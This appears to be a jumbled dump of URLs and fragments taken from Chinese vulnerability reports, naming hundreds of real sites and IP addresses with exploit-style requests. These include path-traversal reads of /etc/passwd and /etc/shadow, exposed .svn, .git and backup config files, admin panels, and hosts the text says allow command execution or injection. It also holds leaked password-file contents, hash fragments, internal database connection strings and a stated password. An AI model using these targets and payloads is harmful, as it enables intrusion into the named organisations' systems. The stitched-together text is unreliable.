http://bx.xiaotong.com.cn/WS/WebService.asmx/GetFileContent http://ac.qfkd.com.cn/WS/WebService.asmx/GetFileContent http://122.224.179.212:8000/WS/WebService.asmx/GetFileContent http://fy.feishang.cn/WS/WebService.asmx/GetFileContent http://218.17.152.205:8181/WS/WebService.asmx/GetFileContent http://nrs.nuctech.com/WS/WebService.asmx/GetFileContent http://114.247.147.253/WS/WebService.asmx/GetFileContent http://101.68.67.227:81/WS/WebService.asmx/GetFileContent http://krs.kirisun.com:8086/WS/WebService.asmx/GetFileContent http://hkahk.dns0755.net:7900//WS/WebService.asmx/GetFileContent http://fol.m4tel.com:1700//WS/WebService.asmx/GetFileContent http://fol.ck-telecom.com:1800/WS/WebService.asmx/GetFileContent http://ac.isantai.com:9000/WS/WebService.asmx/GetFileContent http://www.iyoungsh.com/Hotel/view_hotel.aspx?id=46 http://www.89937373.com/Hotel/view_hotel.aspx?id=46 http://www.bl-air.com/hotel/view_hotel.aspx?id=304 http://www.xwtravel.com/hotel/view_hotel.aspx?id=304 http://www.cht-travel.com/hotel/view_hotel.aspx?id=304 index.php/Index/login http://flow.funguide.com.cn:8080/maguscback/ 
http://www.youzan.com http://bbs.youzan.com/portal.php http://bbs.youzan.com/uc_server/admin.php http://oa.kiiik.com/ http://oa.kiiik.com/tools/SWFUpload/upload.jsp http://oa.kiiik.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/BookRetr.aspx?page=1&KeyVaule=CALLNO&search_Key=%E6%99%AE%E9%80%9A%E6%9F%A5%E8%AF%A2&KeyWord=%E6%9D%A8%E5%8B%87%E4%B8%BB%E7%BC%96 http://**.**.**.**:8088/BookRetr.aspx?KeyWord=%E5%86%AF%E6%99%93%E5%AE%81%2C+%E5%A8%84%E9%AA%8F%E5%BD%AC&search_Key=%E6%99%AE%E9%80%9A%E6%9F%A5%E8%AF%A2&KeyVaule=%E4%BD%9C%E8%80%85 http://**.**.**.**/opac/BookRetr.aspx?Index=6&KeyWord=J228.7&SrchTab=0 http://222.240.176.21 https://github.com/shuniahuang/ele.me/blob/35d2a105385d31224f46a5c9f57df39afce466be/coffee-hr/coffee-hr-impl/coffee-hr-permission-impl/src/main/resources/coffee-hr-common.xml http://www.googosoft.com/ http://211.67.63.14/dxyq/BBSDefault.aspx?id=1 http://210.31.141.73/dxyq/BBSDefault.aspx?id=1 http://211.69.16.30/dxyq/BBSDefault.aspx?id=1 http://211.64.120.53/dxyq/BBSDefault.aspx?id=1 http://211.67.112.115/dxyq/BBSDefault.aspx?id=1 http://cb.cnki.net/index.aspx http://cb.cnki.net/admin/adminLogin.aspx http://cb.cnki.net/admin/JournalMngr.aspx www.91dk.com www.hero.bbs.9wee.com www.9wee.com www.j1.sg.9wee.com www.s133.hero.9wee.com www.97.sese.cmhero.bbs.9wee.com www.s45.sg.9wee.com www.s55.sg.9wee.com www.cs.9wee.com www1.9wee.com www.s13.hero.9wee.com www.265610.9wee.com www.9.9wee.com https://122.226.206.81:10000/ http://www.sy.e21.edu.cn/upload_files/ http://st.renren.com/activity/71056 http://121.201.7.202:8082/governance/addresses http://117.41.251.138/jxjs/ http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985&reportType=FB040 http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985 http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985 http://61.155.106.135:8080 http://61.155.106.135:8080/useredit.php http://11x5.js-lottery.com:8080/jscpcx.php http://xuanwu.changba.com/bbs.rar 
http://localhost/reset?token=202cb962ac59075b964b07152d234b70 http://localhost/reset?token[0]=like&token[1]=2%25 http://www.ohkj.com/ui/Innovation_Enterprise.aspx?Type=1&T=%E9%AB%98%E6%96%B0%E6%8A%80%E6%9C%AF%E4%BC%81%EF%BF%BD?SortID=16 http://www.onefoundation.cn/phpinfo.php http://erpn.fang.com/ erpn.fang.com/SystemManage/News/NewsDetail.aspx?newsid=151 erpn.fang.com/SystemManage/News/NewsDetail.aspx?newsid=151 http://pfxzsp.spb.gov.cn/generalservice/loginlog/downLoadAction.do http://www.smm.cn/.svn/entries http://trend.smm.cn/.svn/entries http://f.smm.cn/.svn/entries http://b.smm.cn/.svn/entries url:http://fax.sfn.cn/feat/Account/List.aspx http://bbl.changyou.com/.svn/entries http://my.youboy.com/checkEmail.do?token=516e9314ff048dac1c4e1416c9c0b1c761e7d916680449737f3c53c25746ea70&usid=1951126 http://www.dajiashuo.com/HelpUserRule.aspx?show=11 test:888888 http://www.ichengyo.com http://59.173.243.45:8000/general/login/index.php se://myfavor/存在一处XSS,可以读取用户访问的网页数据。 http://stream.gionee.com/.git/config http://sync.gionee.com/.git/config http://id.gionee.com/.git/config http://dianpu.fang.com/ http://rszp.cqu.edu.cn/zpsys/index.jsp http://rszp.cqu.edu.cn/zpsys/uploadfile/file/20707__0065m5m12h-xxk6rg-iadlkswk-1-ib02oamb-x.jsp http://wiki.changba.com:8090 http://v.changba.com:8888/common/config.inc.php.bak http://v.changba.com:8888/common/config.inc.php1 http://59.151.31.233:8888/common/config.inc.php.bak http://59.151.31.233:8888/common/config.inc.php1 http://v.changba.com:8888/crontab/.svn/entries http://v.changba.com:808/login/.svn/entries http://basic.open.com.cn/learnbar/user/updateName.json http://218.91.46.102:8080/web/loginaction!logout.action http://www.pptv.com/ http://api.usergrowth.pptv.com/getUserBilling?username=**********&format=jsonp&cb=jQuery18306921253258079285_1434780200316&token=dp2ozX7d***************XEA%0D%0A&_=1434780201259 http://**.**.**.**/tzptweb/webpages/all_search_list_page.aspx http://**.**.**.**//webpages/all_search_list_page.aspx 
http://116.255.135.35:8082/finance_glx/monitor/resource_form.jsp?village_dm=0110004 http://111.12.148.194:7005/finance_qhld/monitor/resource_form.jsp?village_dm=0110004 http://222.185.126.83:8081/finance28/monitor/resource_form.jsp?village_dm=0110008 http://124.163.225.208:8082/finance13/cmp/monitor/resource_form.jsp?village_dm=0111010 http://61.178.243.126:8083/finance13N/cmp/monitor/resource_form.jsp?village_dm=0103022 http://115.182.12.9/security/login.hlt http://27.17.18.107:8080/GTJY_HB/resslist_page.action;jsessionid=00C7D1D1D55692B706D448BFAA5664E6?currentPage=2存在命令执行漏洞 http://122.224.213.103:8080/caisyys/login/login.action存在命令执行漏洞 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin tomcat:x:500:500::/home/tomcat:/bin/bash sshh:x:501:501::/home/sshh:/bin/bash 
super:x:502:502::/home/super:/bin/bash wJY0:15885:0:99999:7 BYdMARz5EkyZ1:15949:30:30:7 hqw8c90qAHQ0:15949:30:30:7 encap:Ethernet D4:85:64:5B:C1:DE addr:122.224.213.103 Bcast:122.224.213.127 Mask:255.255.255.192 d685:64ff:fe5b:c1de/64 Scope:Link MTU:1500 packets:310007145 packets:56120097 txqueuelen:1000 http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212 coding:utf-8-*- https://59.33.255.14/ http://www.nbctsg.com/lvyou_info.php?id=128 http://www.nbctsg.com/login.php http://www.hbnsyh.com/show.asp?id=1005 http://sqlmap.org http://www.gzeducms.cn/login.jsp http://video.grandcloud.cn//index.php?m=poster&c=index&a=poster_click&id=1 http://web.grandcloud.cn/index.php?m=poster&c=index&a=poster_click&id=1 http://42.62.65.124:8080/renewableEnergy/login_login.action存在命令执行漏洞 URL:http://b2bi.gome.com.cn/security/login.hlt http://www.bjzq.com.cn/dpfx/ShowClass.asp?ClassID=9 http://www.bjzq.com.cn/hsgs/ShowClass.asp?ClassID=32 http://www.bjzq.com.cn/hyzq/ShowClass.asp?ClassID=26 http://www.bjzq.com.cn/syjq/ShowClass.asp?ClassID=14 http://www.bjzq.com.cn/realty/ShowClass.asp?ClassID=36 http://www.bjzq.com.cn/Soft/ShowClass.asp?ClassID=24 http://www.bjzq.com.cn/JS/index.asp?action=addfang http://www.bjzq.com.cn/qihuo/ShowClass.asp?ClassID=46 http://www.bjzq.com.cn/fund/ShowClass.asp?ClassID=53 http://115.28.233.30:7921/web/users/depttree.php?deptid=&level=0&deptname= http://1.93.4.40:89/web/users/depttree.php?deptid=&level=0&deptname= http://www.bj-tofi.com:89/web/users/depttree.php?deptid=&level=0&deptname= http://218.89.3.21:89/web/users/depttree.php?deptid=&level=0&deptname= http://121.199.29.166:89/users/depttree.php?deptid=&level=0&deptname= http://122.200.76.233/web/users/depttree.php?deptid=&level=0&deptname= http://115.28.233.30:7921/web/conferences/journal.php?confid=732453&page=2&topic=SMB 
http://218.89.3.21:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://www.bj-tofi.com:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://122.200.76.233/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://1.93.4.40:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://121.199.29.166:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://122.200.76.233/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://www.bj-tofi.com:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://218.89.3.21:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://115.28.233.30:7921/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://1.93.4.40:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://121.199.29.166:89/web/department/depttree.php?parentid=1 http://122.200.76.233/web/department/depttree.php?parentid=1 http://www.bj-tofi.com:89/web/department/depttree.php?parentid=1 http://218.89.3.21:89/web/department/depttree.php?parentid=1 http://115.28.233.30:7921/web/department/depttree.php?parentid=1 http://1.93.4.40:89/web/department/depttree.php?parentid=1 http://121.199.29.166:89/web/dept.php?lan=zh_cn&deptcode=root http://122.200.76.233/web/dept.php?lan=zh_cn&deptcode=root http://www.bj-tofi.com:89/web/dept.php?lan=zh_cn&deptcode=root http://218.89.3.21:89/web/dept.php?lan=zh_cn&deptcode=root http://115.28.233.30:7921/web/dept.php?lan=zh_cn&deptcode=root http://1.93.4.40:89/web/dept.php?lan=zh_cn&deptcode=root http://oa.sqgf.com/ http://www.sdbys.cn/index_.html http://ntc.org.cn/e/action/ShowInfo.php?classid=70&id=1 http://k.thea.cn/upload_class/camera.swf?inajax=1&appid=1&agent=83271fd20a6687ffcd0d1b6f7ad13cdd&ucapi=http%3A%2F%2Fk.thea.cn%2Fupload_class&input=uid%3D2620600&avatartype=virtual http://www.secoo.com/ qqexmail:http://mail.secoo.com/ 
http://www.jwss.cc/?q=Powered%20by%20FineCMS%E5%85%8D%E8%B4%B9%E7%89%88&pn=100 http://www.luyoutu.com/ http://www.qianjin998.com/ http://dery.cn/ http://www.xiaomixifan.cn/ http://www.yyxly.com/ http://mylhealth.com/ http://*.ganji.com/logs/error.log http://*.ganji.com/logs/access.log www.ganji.com http://www.ganji.com/pub/pub.php?a http://wooyun.org/bugs/wooyun-2015-0100934 www.topxon.com来测试, www.topxon.com/member http://183.62.45.173:8080/ncsd-zxkr/ http://www.kcjc.net/uc_server/data/config.inc.php.bak http://121.22.98.212:8080/gs/jumpProgram2.action?ipAddr=121.22.98.212:8080存在命令执行漏洞 http://58.253.210.156/ http://www.citsgd.com.cn/guid_sight.aspx?id=497 https://www-401.aig.com.tw/ns/Activitie http://www.0769pf.com/PopUpWindows.aspx?id=1 http://www.0769pf.com/PopUpWindows.aspx?id=1 http://www.020jiaocai.com/PopUpWindows.aspx?id=1 http://www.020jiaocai.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.digitblue.com/PopUpWindows.aspx?id=1 http://www.fujian17.com//PopUpWindows.aspx?id=1 http://demo.dreamershop.com/PopUpWindows.aspx?id=1 https://wmtrade.pscnet.com.tw/wm/activity/show_activity.php?flag=B&mun=216 https://github.com/yinzhuancheng/WoGame http://s.qq.com http://www.jilinjobs.cn:800/EDJLPortalWeb/index.aspx http://my.veryeast.cn/user/setting/SetEmail http://lizhendev.gamepay.hupu.com/.svn/entries https://github.com/shangES/ses/blob/a0bf0b736b95cdb00f091ffd7d970231dc0ab691/WebContent/WEB-INF/classes/application.properties https://mail.wasu.com/ http://202.108.173.222:7001/console/login/LoginForm.jsp http://124.128.254.152/MSP/ http://ge.3geye.mobi/MSP/ http://iqqy.gdbnet.cn/MSP http://125.88.128.117/MSP/ http://iqqy.gdbnet.cn/MSP/ http://116.229.239.68/MSP/ http://116.229.239.72/MSP/ http://wap.edatahome.com/ http://116.229.239.83/ http://116.229.239.84/ http://116.229.239.85/ http://222.221.18.201 
http://open.baojia.com/account/showimage.do?pic_addr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://open.baojia.com/account/showimage.do?pic_addr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow http://218.108.255.183/UserLogin/Login.aspx http://218.108.255.183 http://fax.wasuitv.com/default.aspx http://bbs.tgbus.com/ http://uc.tgbus.com/robots.txt%00a.php http://www.metadata.com.cn/ http://211.67.126.11:8088/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://218.58.59.71:7272/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://202.206.242.26:88/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://210.35.35.73:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://60.214.233.173:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://210.44.1.2:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://218.192.55.9/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://202.121.81.135//Catalogeaction.do?method=adminEdit&TptID=10 http://219.246.100.13:8881/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://211.67.126.11:8088/poweb/manage.do?method=edit&AccID=1 http://218.58.59.71:7272/poweb/manage.do?method=edit&AccID=1 http://202.206.242.26:88/poweb/manage.do?method=edit&AccID=1 http://210.35.35.73:8080/poweb/manage.do?method=edit&AccID=1 http://60.214.233.173:8080/poweb/manage.do?method=edit&AccID=1 http://210.44.1.2:8080/poweb/manage.do?method=edit&AccID=1 http://218.192.55.9/poweb/manage.do?method=edit&AccID=1 http://202.121.81.135//manage.do?method=edit&AccID=1 http://219.246.100.13:8881/poweb/manage.do?method=edit&AccID=1 http://211.67.126.11:8088/poweb/Affiche.do?method=affiche_Edit&AID=36 http://218.58.59.71:7272/poweb/Affiche.do?method=affiche_Edit&AID=1 http://202.206.242.26:88/poweb/Affiche.do?method=affiche_Edit&AID=1 http://210.35.35.73:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 http://60.214.233.173:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 
http://210.44.1.2:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 http://218.192.55.9/poweb/Affiche.do?method=affiche_Edit&AID=1 http://202.121.81.135//Affiche.do?method=affiche_Edit&AID=1 http://219.246.100.13:8881/poweb/Affiche.do?method=affiche_Edit&AID=1 http://ady.oa5.meetok.com/Mall/GoodSearchList.aspx?CuPage=1&Search=%27 http://www.h-h.com.cn/visa/visa_list.aspx?s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=12 http://www.h-h.com.cn/Hotel/SearchList.aspx?CityCode=SHA&CheckInDate=2015-06-24&CheckOutDate=2015-06-29&HotelName=1&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=12&Rank=&MinPrice=&MaxPrice= http://www.h-h.com.cn/view_news.aspx?id=20 http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc www.meetok.com http://f.72dns.com/Login.aspx inurl:qsksyy http://www.lcwscgs.com/qsksyy/ http://123.130.246.26:9080/qsksyy/ http://60.211.179.22:9080/qsksyy/ http://www.wfcgs.com:9080/qsksyy/ http://cgs.ytjj.gov.cn:9061/qsksyy/ http://www.dygajj.gov.cn:9080/qsksyy/ http://58.59.39.43:9080/qsksyy/ http://218.59.228.162/ http://221.2.145.164:9080 http://www.bzwscgs.com:9080 http://mail.cdgjj.gov.cn/extmail/cgi/index.cgi http://www.mafengwo.cn/note/create.php/modify/?id=69100555,新版游记中,如图所示: http://www.gfortune.com.tw/gf_news/view_g_news.asp http://mazda.vcyber.com/ http://www.tv.cn/.git/config http://www.tomcat360.com/.git/ http://www.tomcat360.com/wp-content/themes/xm2015/tz.php http://95508.com/C1ztq4MjO0 http://www.wolive.com.cn/login.html http://www.wolive.com.cn/service/UserLogin.jsp?UserName=123&UserPass=123 http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000005-000001 http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000740-000001 
http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000740-009500 http://61.49.38.13:8888/noticeDetail.action?itemId=8a2530114843ba4d01497a73262a009c存在命令执行漏洞 XkksOR2snEkzmCDEMzrnX1:16196:0:99999:7 J486jemGhP9tU1Cpk6MwV1:16263:30:90:7 sZJRRV10:16399:30:90:7 encap:Ethernet addr:10.165.176.73 Bcast:10.165.176.255 Mask:255.255.255.0 fe5a:3f18/64 Scope:Link MTU:1500 packets:62421969 packets:395437 txqueuelen:1000 http://**.**.**/ http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070003 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070001 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070002 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070003 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070004 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1505050002 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1505050003 http://219.148.198.26:8080/tellin/opr/basecall/login.do?CLS=USR&UITRANSFER=servicekey:274 http://219.148.198.26:8080 http://tb.81890.gov.cn/EnterpriseWeb/Enterprise/Enterprise.aspx?ID=47220 http://a.opda.com/ http://wutongyu.info/host.php http://www.gxpiao.com/xianlusearch.html?city=%e8%b4%ba%e5%b7%9e%e5%b8%82 http://www.gxpiao.com/Movie_page1.aspx?dyyid=DYYLB141029-0001 http://121.42.24.155:8888/zww/crj/content.jsp?artid=103 http://121.42.24.155:8888/zww/crj/list.jsp?classid=001001存在注入,参数classid http://121.42.24.155:8888/zww/crj/search.jsp?keys=1234 http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://v.diditaxi.com.cn/point?cityId=210100&scope=city&date=0&dimension=distribute&num=300 http://beian.xrnet.cn/beian.tar.gz 
http://article.zol.com.cn/admin/survey/vote_preview.php?voteid=1963 http://www.soso.com/websnapshot??ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=e99b271f73c314d46de1735302e8b5fa&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&rfrom=soso&w=01020400&m=0&st=0&uid=11090&ref=&furl=http%3A%2F%2Fwww.wangdaixitong.com%2Findex.html&title=%E9%87%91%E9%92%B1%E6%9F%9C%E7%BD%91%E8%B4%B7%E7%B3%BB%E7%BB%9F-P2P%E7%BD%91%E8%B4%B7%E7%B3%BB%E7%BB%9F_%E7%BD%91%E8%B4%B7%E5%B9%B3%E5%8F%B0%E5%BC%80%E5%8F%91_%E8%82%A1%E7%A5%A8%E9%85%8D%E8%B5%84%E7%B3%BB%E7%BB%9F_%E8%82%A1%E6%9D%83%E4%BC%97%E7%AD%B9%E7%B3%BB%E7%BB%9F%2C%E6%9C%80%E6%9D%83%E5%A8%81%E3%80%81%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84P2P%E7%BD%91%E8%B4%B7%E6%BA%90%E7%A0%81 http://qq.mb5u.com/about.html http://www.jlsgs.gov.cn/jlsxx/zxts.asp?user=7 http://www.jlsgs.gov.cn/image/pentest.asp http://db.auto.sohu.com/seckill/admin/config_c.shtml http://db.auto.sohu.com/seckill/admin/addc.shtml http://www.gdupc.com.cn/ http://111.205.44.42/license!getExpireDateOfDays.action http://a-test.bdqn.cn https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2628100&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2627081&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2627054&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2626018&storeId=10652&type=PC https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360256&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360154&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360160&langId=-7&storeId=10652 http://www.iqm.cn/.svn/entries http://**.**.**.**/workplate/base/user/multisel.aspx 
http://**.**.**.**:8001/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx inurl:http://vdisk.weibo.com/?access_code= http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g?access_code=XJ35 http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g http://vdisk.weibo.com/lc/i4jUfWOlJGfrqcDey http://vdisk.weibo.com/lc/1xR3PoswO2NGdlJgW5v http://vdisk.weibo.com/lc/TJpjvoNIdvcGkMjGC http://vdisk.weibo.com/lc/gwtj5zm4b3PPMkNz http://vdisk.weibo.com/lc/jxpRXXPJtQSmb53yK http://vdisk.weibo.com/lc/f7C4p3ropAAE9uYe8 http://140.207.229.58:9090/ http://ap.189store.com/RegisterInfo/FindPassWordForEmail?UID=1 http://ap.189store.com/RegisterInfo/GetPassWord?UID=1 http://ap.189store.com/RegisterInfo/GetPassWord?UID=1&sendid=f0a9c426-f380-4a67-b234-2fea2010948b http://disk.bestcloud.cn/ http://disk.bestcloud.cn/demo/ http://disk.bestcloud.cn/demo/index.php/adminControlPanel/device/type/index/self/56 http://www.iqianjin.com/ http://www.jctrans.com/Reg/MailActivation.aspx?UserName= http://www.jctrans.com/Reg/MailActivation.aspx?UserName=admin http://www.jctrans.com/Reg/RActivation.aspx?userid=7E119612-C9C7-4186-A120-BEDFB0FB9FA8 http://www.jctrans.com/Reg/RActivation.aspx?userid=7E119612-C9C7-4186-A120-BEDFB0FB9FA8 http://www.jctrans.com/editpassword.aspx http://www.jctrans.com/Reg/MailActivation.aspx?UserName=haha http://www.jctrans.com/Reg/RActivation.aspx?userid=C4A52CFF-8366-4C0A-95F0-04570DF97C2C http://www.jctrans.com/Login.aspx http://club.jctrans.com/space.php?uid=731124 http://www.jctrans.com/Reg/MailActivation.aspx?UserName=jctransbbs http://www.jctrans.com/EditPassWordSecond.aspx?userid=0922717F-F0FB-4E86-ACD5-2DCB84CFD906 http://club.jctrans.com/admincp.php?action=members&username=jctransbbs&searchsubmit=yes&frames=yes http://www.ztesoft.com:808/zsmart/index.php 
http://www.ztesoft.com:808/static/index.php?module=CoreHome http://www.ztesoft.com:808/poll/admin/admin.php http://shanpin.m1905.com/ http://shanpin.m1905.com/download?dir=downloadFile&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://portal.weixinprint.com/equipment/client/queryList?menu_parent=1&menu_parent_name= http://portal.weixinprint.com/equipment/client/inputClient?select=&clientId=89 http://portal.weixinprint.com/equipment/visns/publicDetail?publicId=76904&select= http://www.uxin.com/update/show/os/android/Id/274.html http://www.uxin.com/news/index/type/1.html http://www.uxin.com/news/info/id/1277.html http://180.168.135.178:8088/remote/yhaction!list.action?yhname=360 http://180.168.135.178:8088/remote/yhaction!list.action?yhname=hzwk http://180.168.135.178:8088/remote/yhaction!list.action?yhname=CIB http://180.168.135.178:8088/remote/pageno.jsp密码734303 http://124.42.19.180:8088/chouchaReg/choucha/toReg-reg.action?classId=90000存在命令执行漏洞 swK0R2uzx6x45ZaH6tcG61:13062:0:99999:7 Q7iZBCJtjz9ND4hOb3f5P0:14321:0:99999:7 tuiGHpkFGq7ymxNeYsB0:14306:0:99999:7 DeVXOrImTFMIOdpCHNptX1:15044:0:99999:7 http://219.233.250.184:8088/report/register/register!init.action存在命令执行漏洞 http://mooc.chaoxing.com/erya/error http://passport2.chaoxing.com/login5?uid=22207734enc=2b3d866926e61dae7aeb03a5010a556c http://broker.esf.sina.com.cn/login?client_citycode=sh&r=baidu#&qq-pf-to=pcqq.group http://tls.8mov.net:90/datamanage/index.php http://tls.8mov.net:90/manage/phpinfo.php http://tls.8mov.net:90/manage/ http://www.nipcip.com/ http://www.ztmbec1.com/ http://www.hnprec.com/ http://www.zzeqmjb.com/ http://www.zzmw.gov.cn/ http://www.dengfengtv.com/ http://www.kfga.gov.cn/ http://123.15.4.130:8080/ http://www.wdqsq.gov.cn/ http://www.shilongqu.gov.cn/ http://www.wuzhi.gov.cn/ http://www.xcsrd.gov.cn/ http://211.142.134.26:8866/gxj/ http://www.luanchuanly.gov.cn/ http://www.zkcz.gov.cn/ http://www.yangguangyouzhi.com/ about:blank。这使得我前面找到的bypass标签作废。 about:last 
javascript://协议的时候,这个域是res: about:blank,则为空,譬如你们之前修复的about:reader http://raisedreams.com/ http://qijian.raisedreams.com http://www.iliangcang.com/i/brand/intro/?is_intro=1&id=15 http://lc-master.iliangcang.com/成功登录,可以管理注册用户,有36W之多,当然有很多僵尸账号 http://74.201.81.139/WEB-INF/proxool.xml http://74.201.81.139/WEB-INF/web.xml http://cas.us.changyou.com/ http://www.cscec3b.com.cn/ http://61.183.130.134:8888/loginindex.action http://61.237.231.101:8080 http://61.157.144.46:8080/查询地址 http://jobs.ele.me/login http://exam.heuet.edu.cn:80/jiaowu/panduan.asp http://218.108.129.135:8080/demo_main.do http://bx.fesco.com.cn/Front/default.aspx http://trade.ctrip.com/Flight/_version0805/Home/index.aspx http://fenxiao.lvmama.com/home/index.jsp驴妈妈分销平台 Url:http://a.g.gomesell.com/login/login.action http://a.g.gomesell.com/test.txt http://a.g.gomesell.com/wooyun.jsp jdbc:mysql://10.58.222.30:43306/biz?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.30:43306/b2c?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.34:43306/kubaopen?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.32:43306/kubauser?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/biz?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/b2c?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/kubaopen?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull 